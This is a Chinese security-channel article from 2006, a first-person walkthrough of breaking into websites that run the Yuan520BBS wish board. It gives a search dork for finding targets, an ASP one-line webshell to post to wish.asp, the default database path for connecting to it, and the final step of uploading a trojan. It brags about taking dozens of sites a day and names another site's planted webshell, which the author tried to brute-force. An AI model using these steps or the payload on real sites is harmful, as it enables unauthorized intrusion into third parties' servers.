首页产品库评测行情新闻|手机数码笔记本台式机DIY硬件数字家庭数码相机办公外设|软件下载游戏开发|社区

更多

数码相机
MP4
LCD
机箱
音箱

软件资讯设计 工具 系统 开发 安全 办公 陶吧 IT教育 Windows 7 | 下载中心天极下载中心诚征下载通路合作伙伴
天极网 > 软件频道 > 网络安全>一句话入侵Yuan520BBS许愿版思路总结

一句话入侵Yuan520BBS许愿版思路总结

2006-08-16 07:00作者:五月 整理出处:天极安全责任编辑:卢林嘉

小编推荐更多关于黑客基础内容的文章:

黑客基础内容:DOS常用命令

黑客基础内容:TCP端口作用,漏洞,操作

黑客基础内容:IPC$空连接的入侵和防御

黑客基础内容:21种RING的提权方法

黑客基础内容:菜鸟+Sa+注入=肉鸡


  大家好,今天把自己入侵Yuan520BBS许愿版的过程总结一下。思路其实也很简单,就是利用了Yuan520BBS许愿版的默认数据库,写入一句话进行连接。

  1 第一步当然是搜索了。关键词选“Powered By Yuan520BBS”,会出来一大堆“『购物商城』论坛 - Powered By Yuan520BBS”的网站,随便挑一个,假设为http://xxx.yyy。

  2 去许愿版写一句话马,许愿版的网页一般是 http://xxx.yyy/bbs/wish1/wish.asp,强调一下一句话马是<%execute request("value")%>,里面的value不要改。我以前总不成功,就是因为改value了。

  3 用一句话客户端连接数据库。许愿版的默认数据库地址是http://xxx.yyy/bbs/database/%23wish.asp,你可以打开这个连接看看,如果是一堆乱码,那就没错。如果不是,去暴库吧。我图省事,没去暴库,再说暴库成功率也不高,默认的数据库足够用了。

  4 最后一步,传马,呵呵,就不用我说了吧。看到可爱的小马出现,心里真是激动啊。相信,再菜的鸟看完教程也知道怎么做了。

  这个漏洞看起来很简单,但后果确是很严重的,因为比较容易*作。默认数据库漏洞很具有普遍性,举一反三我们能入侵大量站点。如果再结合挖掘鸡、网站猎手,一天拿下几十个网站不成问题,思路的确很重要,大家不要蛮干阿。

  有趣的是,有个叫小白的朋友在我前面攻入网站,而且堵上后门,但被我把网马挖出来了,http://dh123.com/database/help.asp ,希望小白兄别见怪阿,因为help.asp明显就是一句话马传上去的嘛,呵呵。出于好玩用accessdriver试了试爆破,但没成功,这个网马只有一个密码框,还是很适合爆破的,就是我的字典差点。

软件频道-工具软件&网络安全精品推荐

更多精彩
点击体验>>

热卖推荐: 手机 诺基亚 MP5 电脑包 双卡双待 手机链 U盘 笔记本电脑

关注此文的读者还看过:

返回网络安全首页

共1页。 1
  • 1.一句话入侵Yuan520BBS许愿版思路总结

软件频道最新更新

热点推荐

IT嘉年华

编辑推荐

软件下载

热门
推荐

网友关注

软件
资料
游戏

装机推荐

文章排行

本周
本月
最新更新
天极服务|关于我们|About us|网站律师|RSS订阅|友情合作|加入我们|天极动态|网站地图|意见反馈|MSN/QQ上看天极
Copyright (C) 1999-2012 Yesky.com, All Rights Reserved 版权所有 天极网络